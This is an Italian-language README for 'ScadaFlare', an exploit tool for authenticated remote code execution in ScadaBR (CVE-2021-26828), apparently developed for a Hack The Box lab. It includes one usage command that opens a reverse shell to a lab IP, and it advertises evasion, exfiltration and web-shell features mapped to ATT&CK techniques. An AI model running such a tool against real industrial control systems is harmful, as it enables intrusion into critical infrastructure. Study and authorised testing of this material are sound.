
ScadaFlare Framework di exploit RCE autenticata per ScadaBR (CVE-2021-26828) OpenPLC ScadaBR
Un exploit RCE modulare post-autenticazione che prende di mira ScadaBR <1.1.0, potenziato per le operazioni red team.

.jsp armate tramite view_edit.shtmQuesto exploit è stato sviluppato durante l'analisi dello scenario HTB Pro Lab: Alchemy. Il PoC originale di Fellipe Oliveira era solido, ma:
Questa versione, ScadaFlare, è una riscrittura completa in Python 3 con supporto modulare, molteplici strategie di evasione, override del rilevamento del sistema operativo, integrazione webhook, supporto proxy SOCKS e catene di enumerazione per l'uso operativo nel mondo reale.
python3 scadaflare.py http://172.16.0.20:80 admin admin \
--reverse-ip 10.10.14.44 --reverse-port 4445 \
--verbose --cleanup
ScadaFlare è progettato esclusivamente per:
L'uso non autorizzato contro sistemi industriali reali può:
Utilizzando questo strumento accetti la piena responsabilità di:
Licenza MIT – consulta LICENSE
| Fase | Tecnica | ID |
|---|
| Accesso iniziale (post-autenticazione) | Account validi | T1078 |
| Esecuzione | Sfruttamento di applicazioni esposte al pubblico | T1190 |
| Esecuzione di comandi | Web shell | T1505.003 |
| Azioni privilegiate | Modifica di contenuti web | T1505 |
| Accesso alle credenziali | Credenziali nei file di configurazione | T1552.001 |
| Scoperta | Scoperta di sistemi remoti | T1018 |
| Esfiltrazione | Esfiltrazione tramite servizio web | T1567.002 |
| Evasione della difesa | Tunneling di proxy e protocollo | T1090 |